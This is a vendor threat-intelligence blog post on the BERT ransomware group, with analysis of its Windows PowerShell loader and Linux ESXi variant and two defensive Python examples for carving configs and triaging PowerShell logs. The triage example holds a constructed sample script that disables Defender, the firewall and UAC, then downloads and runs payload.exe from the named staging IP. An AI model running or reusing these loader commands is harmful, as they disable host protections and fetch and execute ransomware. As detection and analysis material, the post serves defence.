
The 2025 Verizon Data Breach Investigations Report (DBIR) underscores that ransomware remains a prevalent threat: it was present in 44% of breaches, up from 32% in the previous year's analysis. With average ransom payments reaching $2 million in 2024, the financial reward is fueling the growth of ransomware activity. As a result, more cybercriminals are turning to ransomware, and new, aggressive strains such as BERT, which targets both Windows and Linux systems, keep emerging. Confirmed victims span Asia, Europe, and the U.S., with healthcare, technology, and event services among the hardest-hit sectors.
Detect BERT Ransomware Attacks
According to Cybersecurity Ventures, a ransomware attack is expected to occur every two seconds by 2031, underscoring the urgent need for proactive threat detection and defense. Modern ransomware campaigns continue to evolve, often combining evasion techniques with targeted delivery to bypass traditional security controls. One such emerging threat is BERT ransomware, a cross-platform strain with a growing global footprint that is disrupting business operations across sectors.
Sign up for the SOC Prime Platform to detect potential attacks against your organization at the earliest stages. The Platform offers a dedicated set of Sigma rules addressing BERT attacks. Hit the Explore Detections button below to access the rules, which are enriched with actionable CTI and backed by a complete product suite for advanced threat detection and hunting.
All the rules in the SOC Prime Platform are compatible with multiple SIEM, EDR, and Data Lake solutions and mapped to the MITRE ATT&CK® framework. Additionally, each rule is packed with detailed metadata, including threat intel references, attack timelines, triage recommendations, and more.
Optionally, cyber defenders can apply the broader “Ransomware” tag to access a wider range of detection rules covering ransomware attacks globally.
On top of that, security experts can streamline threat investigation with Uncoder AI, a private IDE and co-pilot for threat-informed detection engineering. It generates detection logic from raw threat reports, turns IOCs into performance-optimized queries for fast sweeps, predicts ATT&CK tags, optimizes query code with AI tips, and translates it across multiple SIEM, EDR, and Data Lake languages. For instance, defenders can use Trend Micro's research on BERT ransomware to generate an Attack Flow in a single click.
BERT Ransomware Attack Analysis
Security researchers have identified a newly emerged ransomware group targeting organizations across Asia, Europe, and the U.S., with confirmed victims in the healthcare, technology, and event services industries. BERT, tracked by Trend Micro as Water Pombero, deploys ransomware variants for both Windows and Linux and combines a straightforward codebase with efficient attack execution.
The group's tradecraft involves PowerShell-based loaders, privilege escalation, and concurrent file encryption, which make its operations fast and evasive despite the simplicity of the code. On Linux, BERT's ransomware can use up to 50 threads for rapid encryption and can forcibly shut down ESXi virtual machines to hinder recovery and increase damage. First observed in April 2025, BERT has since expanded its operations across Asia and Europe, and researchers confirm active campaigns and ongoing development.
The Windows variant of BERT uses a simple codebase that relies on hard-coded strings to identify and terminate processes. Researchers discovered a PowerShell loader script, start.ps1, which elevates privileges, disables Windows Defender, the Windows Firewall, and UAC, then downloads and executes payload.exe from the IP address 185[.]100[.]157[.]74. While the initial access vector remains unknown, the script launches the ransomware with administrative rights by passing -Verb RunAs to Start-Process. That verb requests elevation through UAC, so on a host where UAC is still enforced and the calling process is not already elevated, the launch produces a consent prompt, which is a visible artifact in its own right. The same IP hosts an open directory containing ransomware components such as payload.exe and start.ps1, suggesting it serves as BERT's staging infrastructure. Notably, the IP belongs to ASN 39134, registered in russia, potentially indicating ties to threat actors in that region.
Compared to earlier versions, which first enumerated drives and stored the list of file paths before encrypting, the newer BERT variant uses a ConcurrentQueue and a DiskWorker to encrypt files as soon as they are discovered, an improvement in performance and execution speed.
In late spring 2025, researchers identified a Linux variant of BERT ransomware that uses 50 threads to accelerate encryption and shorten the window for detection. If run without command-line parameters, it forcibly shuts down all ESXi virtual machines to maximize impact. Encrypted files receive the .encrypted_by_bert extension, and the malware drops a ransom note containing instructions for contacting the attackers to negotiate payment.
The ransomware's configuration is embedded in JSON format and includes the public key, a Base64-encoded ransom note, file extensions, and other operational details. Evidence suggests BERT may have originated from the Linux version of REvil, known for targeting ESXi servers; code similarities with Babuk and REvil-based ESXi lockers further support this link. JSON-based configurations, common in modern ransomware, make BERT easy to adapt across campaigns.
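To see what pulling that embedded configuration out of a sample looks like in practice, here is an added example (not Trend Micro's or SOC Prime's code, and not BERT's own format): it carves any JSON object out of a byte blob by brace position plus JSON decoding, then decodes the Base64 ransom note. The sample bytes and the field names (public_key, note, extension, skip_extensions) are constructed assumptions; a real sample's key names must be read from the sample itself.

```python
"""Carve an embedded JSON configuration out of a ransomware sample and
decode its Base64 ransom note.

Added example, not Trend Micro's, SOC Prime's or BERT's code. The blob
below is constructed: a fake header, binary noise (including a stray '{'),
then a JSON object modelled on the fields the report describes. Field
names are assumptions.
"""
import base64
import json

ASSUMED_CONFIG = {                       # constructed; key names are assumed
    "public_key": "PLACEHOLDER-PUBLIC-KEY-NOT-A-REAL-KEY",
    "note": base64.b64encode(
        b"Your files are encrypted. Contact us to negotiate.").decode(),
    "extension": ".encrypted_by_bert",   # extension named in the report
    "skip_extensions": [".exe", ".dll", ".encrypted_by_bert"],
}
SAMPLE_BLOB = (b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + b"\x01\x02{junk\x00"
               + json.dumps(ASSUMED_CONFIG).encode()
               + b"\x00" * 4 + b"}\x00")


def carve_json_objects(blob, min_size=16):
    """Yield (offset, dict) for every JSON object parseable from a '{' in blob.

    latin-1 decoding keeps string offsets identical to byte offsets, and
    JSONDecoder.raw_decode stops at the end of the object, so trailing binary
    noise is ignored. A '{' that does not start valid JSON is skipped.
    """
    text = blob.decode("latin-1")
    dec = json.JSONDecoder()
    i = text.find("{")
    while i != -1:
        try:
            obj, end = dec.raw_decode(text, i)
        except json.JSONDecodeError:
            i = text.find("{", i + 1)
            continue
        if isinstance(obj, dict) and end - i >= min_size:
            yield i, obj
            i = text.find("{", end)      # do not re-yield nested objects
        else:
            i = text.find("{", i + 1)


def extract_config(blob):
    """Return the first carved object that carries the assumed config fields,
    with the ransom note already Base64-decoded, or None."""
    for offset, obj in carve_json_objects(blob):
        if "note" in obj and "public_key" in obj:
            note = base64.b64decode(obj["note"]).decode("utf-8", "replace")
            return {
                "offset": offset,
                "public_key": obj["public_key"],
                "extension": obj.get("extension"),
                "skip_extensions": obj.get("skip_extensions", []),
                "ransom_note": note,
            }
    return None


if __name__ == "__main__":
    cfg = extract_config(SAMPLE_BLOB)
    print(f"config at offset {cfg['offset']}: extension {cfg['extension']}")
    print("ransom note:", cfg["ransom_note"])
```

The brace scan is deliberately naive: it tries every `{` and lets the JSON decoder decide, which is robust against binary noise but will also surface unrelated JSON (embedded libraries, resource strings), so the field check in extract_config is what narrows it down.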
The BERT ransomware group illustrates how even basic tooling can lead to successful compromises: emerging actors do not need advanced methods, only a clear path from initial access to encryption and extortion. To mitigate potential BERT ransomware attacks, organizations are encouraged to combine proactive defenses with established security practices. This includes close monitoring of PowerShell activity and unauthorized script execution, especially loaders like start.ps1 that disable protections and elevate privileges; enabling PowerShell Script Block Logging (Event ID 4104) is what makes such script content visible in the first place. Hardening endpoints, limiting administrative privileges, and isolating key assets such as ESXi servers can significantly reduce risk.
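The loader behaviour described in the Windows analysis above and the PowerShell-monitoring advice in the preceding paragraph can be turned into concrete triage logic. The following is an added example, not one of SOC Prime's Sigma rules and not code from Trend Micro's report: it scans PowerShell script-block events (Event ID 4104) for the actions attributed to start.ps1 and buckets each event by how many of them fire together. The three events are constructed, the regexes are assumptions about how such a loader is typically written rather than BERT's exact strings, and the staging IP is the one the report names.

```python
"""Triage PowerShell script-block (Event ID 4104) events for BERT-style
loader behaviour.

Added example, not SOC Prime's Sigma content or Trend Micro's code. Sample
events are constructed; the regexes are assumptions about typical loader
syntax, not BERT's exact strings.
"""
import re

STAGING_IP = "185.100.157.74"   # staging host named (defanged) in the report

# (indicator name, ATT&CK technique, pattern). Patterns are assumptions.
INDICATORS = [
    ("defender_disabled", "T1562.001",
     re.compile(r"Set-MpPreference\b.*-Disable\w*Monitoring\s+\$?true", re.I)),
    ("firewall_disabled", "T1562.004",
     re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.I)),
    ("uac_disabled", "T1548.002",
     re.compile(r"EnableLUA\b.*?\b0\b", re.I)),
    ("payload_from_staging_ip", "T1105",
     re.compile(r"(Invoke-WebRequest|iwr|DownloadFile|curl|wget)\b.*"
                + re.escape(STAGING_IP), re.I)),
    ("runas_elevation", "T1548.002",
     re.compile(r"Start-Process\b.*-Verb\s+RunAs\b", re.I)),
]

SAMPLE_EVENTS = [   # constructed 4104 events, not real telemetry
    {"EventID": 4104, "Computer": "WS01", "ScriptBlockText": "\n".join([
        r"Set-MpPreference -DisableRealtimeMonitoring $true",
        r"netsh advfirewall set allprofiles state off",
        r"Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name EnableLUA -Value 0",
        r"Invoke-WebRequest -Uri http://185.100.157.74/payload.exe -OutFile C:\Users\Public\payload.exe",
        r"Start-Process C:\Users\Public\payload.exe -Verb RunAs",
    ])},
    {"EventID": 4104, "Computer": "WS02",   # benign: only reads the setting
     "ScriptBlockText": "Get-MpPreference | Select-Object DisableRealtimeMonitoring"},
    {"EventID": 4104, "Computer": "WS03",   # single indicator: admin elevating
     "ScriptBlockText": "Start-Process notepad.exe -Verb RunAs"},
]


def assess(event):
    """Return the indicators that fire on one event and a severity bucket
    (None, low, medium, high) driven by how many fire together."""
    text = event.get("ScriptBlockText", "")
    hits = [(name, tech) for name, tech, rx in INDICATORS if rx.search(text)]
    buckets = {0: None, 1: "low", 2: "medium"}
    return {
        "computer": event.get("Computer"),
        "indicators": [n for n, _ in hits],
        "techniques": sorted({t for _, t in hits}),
        "severity": buckets.get(len(hits), "high"),
    }


def triage(events, min_severity="medium"):
    """Keep only assessments at or above min_severity."""
    rank = {"low": 1, "medium": 2, "high": 3}
    out = []
    for ev in events:
        result = assess(ev)
        if result["severity"] and rank[result["severity"]] >= rank[min_severity]:
            out.append(result)
    return out


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(r["computer"], r["severity"], r["indicators"], r["techniques"])
```

Any single indicator is noisy on its own (administrators run Start-Process -Verb RunAs all day), so the value lies in co-occurrence within one script block, which is why the default triage threshold is medium rather than low. Script Block Logging must be enabled for 4104 events to carry the script text at all.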
Overall, enterprises should adopt a layered security approach to defend effectively against BERT ransomware and similar threats. By relying on SOC Prime's complete product suite, backed by AI, automation, and real-time threat intelligence, organizations worldwide can strengthen their security posture against sophisticated ransomware attacks and other emerging threats.
While no specific threat actor has been officially attributed to the campaign, the use of russian-based infrastructure could indicate links with threat groups operating from or connected to that region. SOC Prime users running Microsoft Defender for Endpoint can enable Bear Fence, a plug-and-play, always-on service enriched with automated threat hunting and 242 behavior-based Sigma rules, mapped to ATT&CK, covering all russian APT groups since 2021.
The post BERT Ransomware Group Activity Detection: Attacks Across Asia, Europe, and the U.S. Targeting Windows and Linux Platforms appeared first on SOC Prime.